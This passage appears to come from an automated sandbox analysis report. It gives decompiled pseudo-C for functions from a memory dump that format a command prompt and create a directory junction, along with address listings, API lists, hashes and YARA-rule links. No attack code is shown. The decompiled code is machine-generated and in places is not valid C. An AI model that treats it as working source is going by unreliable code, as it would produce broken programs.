								_t164 = _t164 + 2;
							} while (_t119 != 0);
							_t201 = _t202 + (_t164 - _t210 >> 1) * 2;
							L91:
							_t167 = 0;
							L92:
							 *_t201 = 0;
							_t203 = _v676;
							_t184 = _v676;
							_t107 = _t184 + 2; // 0x2
							_t211 = _t107;
							do {
								_t121 =  *_t184;
								_t184 = _t184 + 2;
							} while (_t121 != _t167);
							_t182 = _t184 - _t211 >> 1;
							_t113 = E011E2616(_t203, _t184 - _t211 >> 1);
							if( *0x11fd544 != 0) {
								EnterCriticalSection( *0x1203858);
								 *0x11fd544 =  *0x11fd544 & 0x00000000;
								LeaveCriticalSection( *0x1203858);
							}
							goto L96;
						}
						_t122 =  *_t163 & 0x0000ffff;
						if(_t122 == 0) {
							goto L86;
						}
						L14:
						while(_t122 != 0) {
							if(_t122 == 0x24) {
								_t213 =  &(_v660[1]);
								_v660 = _t213;
								_v664 = _t213;
								_t204 = 0;
								_v656 = 0x11d3b90;
								while(towupper( *_t213 & 0x0000ffff) !=  *_v656) {
									_t204 = _t204 + 1;
									_t35 = 0x11d3b90 + _t204 * 6; // 0x30050
									_t138 = _t35;
									_v656 = _t138;
									_t167 = 0;
									if( *_t138 != 0) {
										continue;
									}
									L28:
									_t125 = _t204 * 6;
									_t201 = _v652;
									_t214 = _v648;
									if( *((intOrPtr*)(_t125 + 0x11d3b90)) == _t167) {
										goto L92;
									}
									_t40 = _t125 + 0x11d3b92; // 0x3
									_t187 =  *_t40 & 0x0000ffff;
									if(_t187 != 8) {
										_t45 = _t187 - 1; // 0x2
										_t126 = _t45;
										if(_t126 > 9) {
											L78:
											_t127 =  *0x1213cb8;
											if( *0x1213cb8 == 0) {
												_t127 = 0x1213ab0;
											}
											E011E274C(_t201, _t214, L"%c",  *_t127 & 0x0000ffff);
											_t222 = _t222 + 0x10;
											_t188 = _t201;
											_v664 = _t188 + 2;
											do {
												_t131 =  *_t188;
												_t188 = _t188 + 2;
											} while (_t131 != 0);
											_t189 = _t188 - _v664;
											L83:
											_t190 = _t189 >> 1;
											_t209 = _t214 - _t190;
											_t201 = _t201 + _t190 * 2;
											L84:
											_v648 = _t209;
											_v652 = _t201;
											L85:
											_t173 =  &(_v660[1]);
											_v660 = _t173;
											_t122 =  *_t173 & 0x0000ffff;
											goto L14;
										}
										switch( *((intOrPtr*)(_t126 * 4 +  &M011F7698))) {
											case 0:
												_t132 = E011D96A0(0, 1, _t201, _t214);
												goto L36;
											case 1:
												__edx = 0;
												__edx = 1;
												__ecx = 0;
												__eax = E011D5AEF(0, 1, __edi, __esi);
												L36:
												_t201 = _t201 + _t132 * 2;
												_t209 = _t214 - _t132;
												goto L84;
											case 2:
												__eax =  *0x1213cb8;
												if( *0x1213cb8 == 0) {
													__eax = 0x1213ab0;
												}
												__eax = E011E274C(__edi, __esi, L"%s", __eax);
												__edx = __edi;
												__eax = __edx + 2;
												_v656 = __edx + 2;
												__ecx = 0;
												do {
													__ax =  *__edx;
													__edx = __edx + 2;
												} while (__ax != __cx);
												__edx = __edx - _v656;
												goto L83;
											case 3:
												__ecx =  &_v124;
												E011D443C(__ecx) =  &_v124;
												__esi = E011DB3FC(__ecx, 0x2350,  &_v124);
												E011E274C(__edi, _v648, L"%s", __esi) = LocalFree(__esi);
												__edx = __edi;
												__esi = __edx + 2;
												__ecx = 0;
												do {
													__ax =  *__edx;
													__edx = __edx + 2;
												} while (__ax != __cx);
												__edx = __edx - __esi;
												__esi = _v648;
												goto L83;
											case 4:
												__eax = 0x11d3948;
												if(_v672 == 0) {
													__eax = 0x11d3958;
												}
												__edx = __esi;
												__ecx = __edi;
												__eax = E011E1040(__edi, __esi, __eax);
												__edx = __edi;
												__eax = __edx + 2;
												_v656 = __edx + 2;
												__ecx = 0;
												do {
													__ax =  *__edx;
													__edx = __edx + 2;
												} while (__ax != __cx);
												__edx = __edx - _v656;
												goto L83;
											case 5:
												__edx = __esi;
												__ecx = __edi;
												__eax = E011E1040(__edi, __esi, L"\r\n");
												__edx = __edi;
												__eax = __edx + 2;
												_v656 = __edx + 2;
												__ecx = 0;
												do {
													__ax =  *__edx;
													__edx = __edx + 2;
												} while (__ax != __cx);
												__edx = __edx - _v656;
												goto L83;
											case 6:
												goto L78;
											case 7:
												if( *0x1213cc9 == 0) {
													goto L85;
												}
												__ecx =  *0x1213ce4;
												while(__esi > 1) {
													__eax = __ecx;
													__ecx = __ecx - 1;
													if(__eax == 0) {
														goto L85;
													}
													_push(0x2b);
													_pop(__eax);
													 *__edi = __ax;
													__edi = __edi + 2;
													_v652 = __edi;
													__esi = __esi - 1;
													_v648 = __esi;
												}
												goto L85;
											case 8:
												if( *0x1213cc9 == 0) {
													goto L85;
												}
												_v668 = __ecx;
												__ecx =  *0x1213cb8;
												__eax = __ecx;
												if(__ecx == 0) {
													__eax = 0x1213ab0;
												}
												__ax =  *__eax;
												_v56 =  *__eax;
												if(__ecx == 0) {
													__ecx = 0x1213ab0;
												}
												__ax =  *((intOrPtr*)(__ecx + 2));
												_v54 = __ax;
												_push(0x5c);
												_pop(__eax);
												_v52 = __ax;
												__eax = 0;
												_v50 = __ax;
												__eax =  &_v56;
												if(GetDriveTypeW( &_v56) != 4) {
													goto L85;
												} else {
													__eax = 0;
													_v52 = __ax;
													_v684 = 0x104;
													_v16 = _v16 & 0;
													__eax = E011E7797(__ecx);
													if(__al == 0) {
														_v668 = 0x78;
													} else {
														__eax =  &_v684;
														_push( &_v684);
														__eax =  &_v644;
														_push( &_v644);
														__eax =  &_v56;
														_push( &_v56);
														__eax =  *0x121c028();
														_v668 =  &_v56;
													}
													_v16 = 0xfffffffe;
													if(_v668 == 0) {
														 &_v644 = E011E274C(__edi, __esi, L"%s ",  &_v644);
														__edx = __edi;
														__eax = __edx + 2;
														_v664 = __edx + 2;
														__ecx = 0;
														do {
															__ax =  *__edx;
															__edx = __edx + 2;
														} while (__ax != __cx);
														__edx = __edx - _v664;
													} else {
														if(_v668 == 0x8ca) {
															goto L85;
														}
														_push(L"Unknown");
														_push(__esi);
														_push(__edi);
														__eax = E011E274C();
														__esp = __esp + 0xc;
														__edx = __edi;
														__eax = __edx + 2;
														_v664 = __edx + 2;
														__ecx = 0;
														do {
															__ax =  *__edx;
															__edx = __edx + 2;
														} while (__ax != __cx);
														__edx = __edx - _v664;
													}
													goto L83;
												}
										}
									}
									_t41 = _t125 + 0x11d3b94; // 0x450000
									E011E274C(_t201, _t214, L"%c",  *_t41 & 0x0000ffff);
									_t222 = _t222 + 0x10;
									_t196 = _t201;
									_v656 = _t196 + 2;
									do {
										_t136 =  *_t196;
										_t196 = _t196 + 2;
									} while (_t136 != 0);
									_t189 = _t196 - _v656;
									goto L83;
								}
								_t167 = 0;
								goto L28;
							}
							E011E274C(_t201, _t209, L"%c", _t122 & 0x0000ffff);
							_t222 = _t222 + 0x10;
							_t191 = _t201;
							_t18 = _t191 + 2; // 0x2
							_v656 = _t18;
							_t174 = 0;
							do {
								_t142 =  *_t191;
								_t191 = _t191 + 2;
							} while (_t142 != 0);
							_t193 = _t191 - _v656 >> 1;
							_t201 = _t201 + _t193 * 2;
							_v652 = _t201;
							_t209 = _t209 - _t193;
							_v648 = _t209;
							if(E011D68B5() == 0) {
								L22:
								_v672 = _t174;
								goto L85;
							}
							_v656 =  *_v660 & 0x0000ffff;
							if(E011F7AB0( *_v660 & 0x0000ffff) == 0) {
								_t174 = 0;
								goto L22;
							}
							_v672 = _v656 & 0x0000ffff;
							goto L85;
						}
						goto L91;
					}
				}
			}






































































                                                    0x011f6ff3
                                                    0x011f6ff5
                                                    0x011f6ff6
                                                    0x011f6ffa
                                                    0x011f7001
                                                    0x011f7005
                                                    0x011f7007
                                                    0x011f7009
                                                    0x011f700e
                                                    0x011f7019
                                                    0x011f701a
                                                    0x011f701b
                                                    0x011f701c
                                                    0x011f701d
                                                    0x011f7023
                                                    0x011f7028
                                                    0x011f702b
                                                    0x011f702d
                                                    0x011f7032
                                                    0x011f7033
                                                    0x011f7036
                                                    0x011f703c
                                                    0x011f7041
                                                    0x011f7047
                                                    0x011f704d
                                                    0x011f704f
                                                    0x011f7050
                                                    0x011f7055
                                                    0x011f7062
                                                    0x011f7068
                                                    0x011f7074
                                                    0x011f7074
                                                    0x011f707a
                                                    0x011f7080
                                                    0x011f7678
                                                    0x011f767b
                                                    0x011f7683
                                                    0x011f7684
                                                    0x011f7695
                                                    0x011f7086
                                                    0x011f7086
                                                    0x011f708c
                                                    0x011f7093
                                                    0x011f7098
                                                    0x011f70a0
                                                    0x011f70b9
                                                    0x011f70bb
                                                    0x011f70c3
                                                    0x011f70d0
                                                    0x011f70d8
                                                    0x011f70dd
                                                    0x011f70dd
                                                    0x011f70a2
                                                    0x011f70a7
                                                    0x011f70a7
                                                    0x011f70e4
                                                    0x011f70ec
                                                    0x011f70ee
                                                    0x011f70ee
                                                    0x011f70f4
                                                    0x011f70fa
                                                    0x011f7105
                                                    0x011f710a
                                                    0x011f7112
                                                    0x00000000
                                                    0x011f7118
                                                    0x011f7118
                                                    0x011f711a
                                                    0x011f7122
                                                    0x011f712b
                                                    0x011f712c
                                                    0x011f7132
                                                    0x011f713a
                                                    0x011f75eb
                                                    0x011f75eb
                                                    0x011f75f2
                                                    0x011f75f4
                                                    0x011f75f4
                                                    0x011f7600
                                                    0x011f7607
                                                    0x011f760f
                                                    0x011f7611
                                                    0x011f7611
                                                    0x011f7616
                                                    0x011f7616
                                                    0x011f7619
                                                    0x011f761c
                                                    0x011f7625
                                                    0x011f7628
                                                    0x011f7628
                                                    0x011f762a
                                                    0x011f762c
                                                    0x011f762f
                                                    0x011f7635
                                                    0x011f7637
                                                    0x011f7637
                                                    0x011f763a
                                                    0x011f763a
                                                    0x011f763d
                                                    0x011f7640
                                                    0x011f7647
                                                    0x011f764b
                                                    0x011f7657
                                                    0x011f765f
                                                    0x011f7665
                                                    0x011f7672
                                                    0x011f7672
                                                    0x00000000
                                                    0x011f7657
                                                    0x011f7140
                                                    0x011f7146
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011f714c
                                                    0x011f7159
                                                    0x011f71ed
                                                    0x011f71f0
                                                    0x011f71f6
                                                    0x011f71fe
                                                    0x011f7200
                                                    0x011f720a
                                                    0x011f7220
                                                    0x011f7224
                                                    0x011f7224
                                                    0x011f722a
                                                    0x011f7230
                                                    0x011f7235
                                                    0x00000000
                                                    0x00000000
                                                    0x011f723b
                                                    0x011f723b
                                                    0x011f7245
                                                    0x011f724b
                                                    0x011f7251
                                                    0x00000000
                                                    0x00000000
                                                    0x011f7257
                                                    0x011f7257
                                                    0x011f7261
                                                    0x011f729d
                                                    0x011f729d
                                                    0x011f72a3
                                                    0x011f7582
                                                    0x011f7582
                                                    0x011f7589
                                                    0x011f758b
                                                    0x011f758b
                                                    0x011f759b
                                                    0x011f75a0
                                                    0x011f75a3
                                                    0x011f75a8
                                                    0x011f75b0
                                                    0x011f75b0
                                                    0x011f75b3
                                                    0x011f75b6
                                                    0x011f75bb
                                                    0x011f75c1
                                                    0x011f75c1
                                                    0x011f75c3
                                                    0x011f75c5
                                                    0x011f75c8
                                                    0x011f75c8
                                                    0x011f75ce
                                                    0x011f75d4
                                                    0x011f75da
                                                    0x011f75dd
                                                    0x011f75e3
                                                    0x00000000
                                                    0x011f75e3
                                                    0x011f72a9
                                                    0x00000000
                                                    0x011f72b7
                                                    0x00000000
                                                    0x00000000
                                                    0x011f72c8
                                                    0x011f72ca
                                                    0x011f72cb
                                                    0x011f72cd
                                                    0x011f72bc
                                                    0x011f72bc
                                                    0x011f72bf
                                                    0x00000000
                                                    0x00000000
                                                    0x011f72d4
                                                    0x011f72db
                                                    0x011f72dd
                                                    0x011f72dd
                                                    0x011f72ea
                                                    0x011f72f2
                                                    0x011f72f4
                                                    0x011f72f7
                                                    0x011f72fd
                                                    0x011f72ff
                                                    0x011f72ff
                                                    0x011f7302
                                                    0x011f7305
                                                    0x011f730a
                                                    0x00000000
                                                    0x00000000
                                                    0x011f7315
                                                    0x011f731d
                                                    0x011f732b
                                                    0x011f7343
                                                    0x011f7349
                                                    0x011f734b
                                                    0x011f734e
                                                    0x011f7350
                                                    0x011f7350
                                                    0x011f7353
                                                    0x011f7356
                                                    0x011f735b
                                                    0x011f735d
                                                    0x00000000
                                                    0x00000000
                                                    0x011f7370
                                                    0x011f7375
                                                    0x011f7377
                                                    0x011f7377
                                                    0x011f737d
                                                    0x011f737f
                                                    0x011f7381
                                                    0x011f7386
                                                    0x011f7388
                                                    0x011f738b
                                                    0x011f7391
                                                    0x011f7393
                                                    0x011f7393
                                                    0x011f7396
                                                    0x011f7399
                                                    0x011f739e
                                                    0x00000000
                                                    0x00000000
                                                    0x011f73ae
                                                    0x011f73b0
                                                    0x011f73b2
                                                    0x011f73b7
                                                    0x011f73b9
                                                    0x011f73bc
                                                    0x011f73c2
                                                    0x011f73c4
                                                    0x011f73c4
                                                    0x011f73c7
                                                    0x011f73ca
                                                    0x011f73cf
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011f73e1
                                                    0x00000000
                                                    0x00000000
                                                    0x011f73e7
                                                    0x011f7410
                                                    0x011f73ef
                                                    0x011f73f1
                                                    0x011f73f4
                                                    0x00000000
                                                    0x00000000
                                                    0x011f73fa
                                                    0x011f73fc
                                                    0x011f73fd
                                                    0x011f7400
                                                    0x011f7403
                                                    0x011f7409
                                                    0x011f740a
                                                    0x011f740a
                                                    0x00000000
                                                    0x00000000
                                                    0x011f7421
                                                    0x00000000
                                                    0x00000000
                                                    0x011f7427
                                                    0x011f742d
                                                    0x011f7435
                                                    0x011f7437
                                                    0x011f7439
                                                    0x011f7439
                                                    0x011f743e
                                                    0x011f7441
                                                    0x011f7447
                                                    0x011f7449
                                                    0x011f7449
                                                    0x011f744e
                                                    0x011f7452
                                                    0x011f7456
                                                    0x011f7458
                                                    0x011f7459
                                                    0x011f745d
                                                    0x011f745f
                                                    0x011f7463
                                                    0x011f7470
                                                    0x00000000
                                                    0x011f7476
                                                    0x011f7476
                                                    0x011f7478
                                                    0x011f747c
                                                    0x011f7486
                                                    0x011f7489
                                                    0x011f7490
                                                    0x011f74b2
                                                    0x011f7492
                                                    0x011f7492
                                                    0x011f7498
                                                    0x011f7499
                                                    0x011f749f
                                                    0x011f74a0
                                                    0x011f74a3
                                                    0x011f74a4
                                                    0x011f74aa
                                                    0x011f74aa
                                                    0x011f74bc
                                                    0x011f750b
                                                    0x011f755a
                                                    0x011f7562
                                                    0x011f7564
                                                    0x011f7567
                                                    0x011f756d
                                                    0x011f756f
                                                    0x011f756f
                                                    0x011f7572
                                                    0x011f7575
                                                    0x011f757a
                                                    0x011f750d
                                                    0x011f7517
                                                    0x00000000
                                                    0x00000000
                                                    0x011f751d
                                                    0x011f7522
                                                    0x011f7523
                                                    0x011f7524
                                                    0x011f7529
                                                    0x011f752c
                                                    0x011f752e
                                                    0x011f7531
                                                    0x011f7537
                                                    0x011f7539
                                                    0x011f7539
                                                    0x011f753c
                                                    0x011f753f
                                                    0x011f7544
                                                    0x011f7544
                                                    0x00000000
                                                    0x011f750b
                                                    0x00000000
                                                    0x011f72a9
                                                    0x011f7263
                                                    0x011f7272
                                                    0x011f7277
                                                    0x011f727a
                                                    0x011f727f
                                                    0x011f7287
                                                    0x011f7287
                                                    0x011f728a
                                                    0x011f728d
                                                    0x011f7292
                                                    0x00000000
                                                    0x011f7292
                                                    0x011f7239
                                                    0x00000000
                                                    0x011f7239
                                                    0x011f716a
                                                    0x011f716f
                                                    0x011f7172
                                                    0x011f7174
                                                    0x011f7177
                                                    0x011f717d
                                                    0x011f717f
                                                    0x011f717f
                                                    0x011f7182
                                                    0x011f7185
                                                    0x011f7190
                                                    0x011f7192
                                                    0x011f7195
                                                    0x011f719b
                                                    0x011f719d
                                                    0x011f71aa
                                                    0x011f71dc
                                                    0x011f71dc
                                                    0x00000000
                                                    0x011f71dc
                                                    0x011f71b5
                                                    0x011f71c4
                                                    0x011f71da
                                                    0x00000000
                                                    0x011f71da
                                                    0x011f71cf
                                                    0x00000000
                                                    0x011f71cf
                                                    0x00000000
                                                    0x011f714c
                                                    0x011f7112

                                                    APIs
                                                    • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(1805BC26,?,00000000), ref: 011F7062
                                                    • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 011F7074
                                                      • Part of subcall function 011DCFBC: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,011FF830,00002000,?,?,?,?,?,011E373A,011D590A,00000000), ref: 011DCFDF
                                                    • towupper.MSVCRT ref: 011F720E
                                                    • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 011F7343
                                                    • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,011D1EB4,011D3958), ref: 011F7467
                                                    • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,1805BC26,?,00000000), ref: 011F765F
                                                    • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 011F7672
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeave$DriveEnvironmentFreeLocalTypeVariabletowupper
                                                    • String ID: %s $%s>$PROMPT$Unknown
                                                    • API String ID: 708651206-3050974680
                                                    • Opcode ID: bc94f35bd33e998031323e592dc12f861d0d8361c922444bbe529f01e04f79dc
                                                    • Instruction ID: 95f026a0171d62c6cfe02235972da7af9d2101779e45c98b7c33a3d9a86c882d
                                                    • Opcode Fuzzy Hash: bc94f35bd33e998031323e592dc12f861d0d8361c922444bbe529f01e04f79dc
                                                    • Instruction Fuzzy Hash: 3A02D479A011169BDF3CDF28D84D6BAB7B6FF54304F04829EE909E7294EB305A81CB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011FB5E0, Relevance: 19.7, APIs: 13, Instructions: 180filememorynativeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 93%
                                                    			E011FB5E0(void* __ecx, void* __eflags) {
				int _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				void* _v40;
				void* _v48;
				void* _t60;
				void _t64;
				void* _t68;
				signed int _t77;
				void _t80;
				signed short _t81;
				long _t88;
				WCHAR* _t91;
				void* _t97;
				intOrPtr* _t102;
				void* _t104;
				void* _t109;
				void* _t111;
				long _t114;
				void* _t115;
				void* _t116;
				void* _t117;

				_t115 = __ecx;
				_v40 = 0;
				_t114 = 1;
				_v16 = 0;
				_v36 = 0;
				_v24 = 0;
				_t91 = E011FB51A( *((intOrPtr*)(__ecx + 8)));
				_t116 = E011FB51A( *((intOrPtr*)(_t115 + 0xc)));
				if(_t91 == 0 || _t116 == 0) {
					L19:
					if(_v36 != 0) {
						RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _v36);
					}
					if(_t114 != 0 && _v24 != 0) {
						RemoveDirectoryW(_t91);
					}
					return _t114;
				} else {
					if(E011FB9D3(_t91, 0, 1) != 0) {
						if(E011FB91D(_t116) != 0) {
							if(CreateDirectoryW(_t91, 0) == 0) {
								goto L19;
							}
							_v24 = 1;
							_t60 = CreateFileW(_t91, 0x40000000, 1, 0, 3, 0x2000000, 0);
							_v20 = _t60;
							if(_t60 == 0xffffffff) {
								goto L19;
							}
							RtlDosPathNameToNtPathName_U(_t116,  &_v40, 0, 0);
							_t97 = _t116;
							_t10 = _t97 + 2; // 0x2
							_t109 = _t10;
							do {
								_t64 =  *_t97;
								_t97 = _t97 + 2;
							} while (_t64 != _v16);
							_v8 = (_v40 & 0x0000ffff) + (_t97 - _t109 >> 1) * 2 + 0x14;
							_t68 = E011E00B0((_v40 & 0x0000ffff) + (_t97 - _t109 >> 1) * 2 + 0x14);
							_v12 = _t68;
							if(_t68 == 0) {
								_t117 = _v20;
								L18:
								CloseHandle(_t117);
								goto L19;
							}
							memset(_t68, 0, _v8);
							_t102 = _v12;
							 *((short*)(_t102 + 4)) = _v8 + 0xfffffff8;
							 *_t102 = 0xa0000003;
							 *((short*)(_t102 + 8)) = 0;
							 *((short*)(_t102 + 0xa)) = _v40;
							memcpy(_t102 + 0x10, _v36, _v40 & 0x0000ffff);
							_t111 = _v12;
							_t77 =  *(_t111 + 0xa) & 0x0000ffff;
							_v32 = _t77;
							_t104 = _t116;
							 *((short*)(_t111 + 0xc)) = _t77 + 2;
							_t31 = _t104 + 2; // 0x2
							_v28 = _t31;
							do {
								_t80 =  *_t104;
								_t104 = _t104 + 2;
							} while (_t80 != _v16);
							_t81 = (_t104 - _v28 >> 1) + (_t104 - _v28 >> 1);
							 *(_t111 + 0xe) = _t81;
							memcpy((_v32 & 0x0000ffff) + _t111 + 0x12, _t116, _t81 & 0x0000ffff);
							_t117 = _v20;
							_t88 = NtFsControlFile(_t117, 0, 0, 0,  &_v48, 0x900a4, _v12, _v8, 0, 0);
							if(_t88 >= 0) {
								_t114 = 0;
							} else {
								SetLastError(RtlNtStatusToDosError(_t88));
							}
							goto L18;
						}
						_push(0x40002749);
						L4:
						SetLastError();
						goto L19;
					}
					_push(0x4000272e);
					goto L4;
				}
			}






























                                                    0x011fb5ea
                                                    0x011fb5f1
                                                    0x011fb5f4
                                                    0x011fb5f5
                                                    0x011fb5fb
                                                    0x011fb5fe
                                                    0x011fb609
                                                    0x011fb610
                                                    0x011fb614
                                                    0x011fb7a2
                                                    0x011fb7a6
                                                    0x011fb7b7
                                                    0x011fb7b7
                                                    0x011fb7bf
                                                    0x011fb7c8
                                                    0x011fb7c8
                                                    0x011fb7d6
                                                    0x011fb622
                                                    0x011fb62e
                                                    0x011fb649
                                                    0x011fb65e
                                                    0x00000000
                                                    0x00000000
                                                    0x011fb666
                                                    0x011fb679
                                                    0x011fb67f
                                                    0x011fb685
                                                    0x00000000
                                                    0x00000000
                                                    0x011fb694
                                                    0x011fb69a
                                                    0x011fb69c
                                                    0x011fb69c
                                                    0x011fb69f
                                                    0x011fb69f
                                                    0x011fb6a2
                                                    0x011fb6a5
                                                    0x011fb6bb
                                                    0x011fb6be
                                                    0x011fb6c3
                                                    0x011fb6c8
                                                    0x011fb798
                                                    0x011fb79b
                                                    0x011fb79c
                                                    0x00000000
                                                    0x011fb79c
                                                    0x011fb6d5
                                                    0x011fb6da
                                                    0x011fb6e6
                                                    0x011fb6ef
                                                    0x011fb6f5
                                                    0x011fb6fd
                                                    0x011fb70a
                                                    0x011fb70f
                                                    0x011fb715
                                                    0x011fb71e
                                                    0x011fb721
                                                    0x011fb723
                                                    0x011fb727
                                                    0x011fb72a
                                                    0x011fb72d
                                                    0x011fb72d
                                                    0x011fb730
                                                    0x011fb733
                                                    0x011fb73e
                                                    0x011fb741
                                                    0x011fb756
                                                    0x011fb75e
                                                    0x011fb778
                                                    0x011fb780
                                                    0x011fb794
                                                    0x011fb782
                                                    0x011fb78a
                                                    0x011fb78a
                                                    0x00000000
                                                    0x011fb780
                                                    0x011fb64b
                                                    0x011fb635
                                                    0x011fb635
                                                    0x00000000
                                                    0x011fb635
                                                    0x011fb630
                                                    0x00000000
                                                    0x011fb630

                                                    APIs
                                                      • Part of subcall function 011FB51A: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,?), ref: 011FB533
                                                      • Part of subcall function 011FB51A: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000008,?,00000000,00000000,?), ref: 011FB54F
                                                      • Part of subcall function 011FB51A: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,?,?,00000000,00000000,?), ref: 011FB560
                                                    • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(40002749,00000001), ref: 011FB635
                                                    • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000001), ref: 011FB656
                                                    • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,40000000,00000001,00000000,00000003,02000000,00000000), ref: 011FB679
                                                    • RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 011FB694
                                                    • memset.MSVCRT ref: 011FB6D5
                                                    • memcpy.MSVCRT ref: 011FB70A
                                                    • memcpy.MSVCRT ref: 011FB756
                                                    • NtFsControlFile.NTDLL(?,00000000,00000000,00000000,?,000900A4,?,?,00000000,00000000), ref: 011FB778
                                                    • RtlNtStatusToDosError.NTDLL ref: 011FB783
                                                    • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 011FB78A
                                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 011FB79C
                                                    • RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 011FB7B7
                                                    • RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011FB7C8
                                                      • Part of subcall function 011FB9D3: memset.MSVCRT ref: 011FBA0F
                                                      • Part of subcall function 011FB9D3: memset.MSVCRT ref: 011FBA37
                                                      • Part of subcall function 011FB9D3: GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000105,-00000105,?,?,?,00000001,00000000,00000000), ref: 011FBAA8
                                                      • Part of subcall function 011FB9D3: GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000001,00000000,00000000), ref: 011FBAC7
                                                      • Part of subcall function 011FB9D3: GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,00000000,?,?,?,00000001,?,?,?,00000001,00000000,00000000), ref: 011FBB0B
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememcpy$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType
                                                    • String ID:
                                                    • API String ID: 223857506-0
                                                    • Opcode ID: 356ebb384ef5a8ee8bf92b891f47f40fe946e2059795193ffc29adf7e704e30d
                                                    • Instruction ID: 3b7fc173a566e4ec8d63d451b9b672e8c641dadc770bbcaf787c64c05c6bfcb5
                                                    • Opcode Fuzzy Hash: 356ebb384ef5a8ee8bf92b891f47f40fe946e2059795193ffc29adf7e704e30d
                                                    • Instruction Fuzzy Hash: B951C270A00605AFDB19DFB8CC58ABFB7B8EF48204F08412DEA06E7250EB359941CB64
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011DE040, Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 289COMMONCrypto
                                                    Download Yara Rule
                                                    C-Code - Quality: 76%
                                                    			E011DE040(long __ecx, long __edx) {
				signed int _v8;
				int _v20;
				char _v24;
				signed int _v28;
				void _v548;
				signed int _v549;
				long _v556;
				long _v560;
				signed int _v564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t81;
				int _t85;
				void* _t89;
				WCHAR* _t90;
				signed char _t91;
				intOrPtr _t92;
				intOrPtr _t96;
				long _t104;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t110;
				int _t111;
				signed char _t113;
				void* _t114;
				intOrPtr _t116;
				signed int _t117;
				void* _t118;
				wchar_t* _t119;
				wchar_t* _t120;
				signed int _t121;
				signed int _t122;
				signed int _t124;
				signed int _t129;
				long _t130;
				intOrPtr* _t131;
				signed int _t133;
				intOrPtr* _t134;
				long _t136;
				void* _t145;
				signed int _t147;
				signed int _t148;
				signed int _t149;
				long _t150;
				long _t151;
				signed int _t152;
				void* _t153;
				void* _t154;

				_t143 = __edx;
				_t81 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t81 ^ _t152;
				_v560 = __edx;
				_t150 = __ecx;
				_v549 = 0;
				_v556 = __ecx;
				_t122 = _t121 | 0xffffffff;
				_v28 = 0;
				_v24 = 1;
				_v20 = 0x104;
				memset( &_v548, 0, 0x104);
				_t154 = _t153 + 0xc;
				if(_v24 == 0) {
					_t85 = 0x104;
				} else {
					_t85 = 0x7fe7;
				}
				_t124 =  &_v548;
				if(E011E0C70(_t124, _t85) < 0) {
					_t147 = 0xfffffffe;
					goto L31;
				} else {
					_t148 = 0;
					while(_t148 < 0x7fe6) {
						_t150 =  *( *((intOrPtr*)(_t150 + 0x38)) + _t148 * 2) & 0x0000ffff;
						_t116 = 0;
						if(_t150 == 0x22) {
							_t117 = _v549;
							_t124 = _t124 & 0xffffff00 | _t117 == 0x00000000;
							_v549 = _t124;
							if(_t117 == 0) {
								_t116 = 0;
							} else {
								_t116 = 1;
							}
							L8:
							if(_t124 != 0 || _t116 != 0) {
								L11:
								if(_t122 != 0xffffffff) {
									L13:
									_t118 = _v28;
									if(_t118 == 0) {
										_t118 =  &_v548;
									}
									 *(_t118 + _t148 * 2) = _t150;
									_t148 = _t148 + 1;
									_t150 = _v556;
									continue;
								}
								_t119 = wcschr(L":.\\", _t150);
								_t154 = _t154 + 8;
								if(_t119 != 0) {
									if( *0x1213cc9 == 0) {
										break;
									}
									_t122 = _t148;
								}
								goto L13;
							} else {
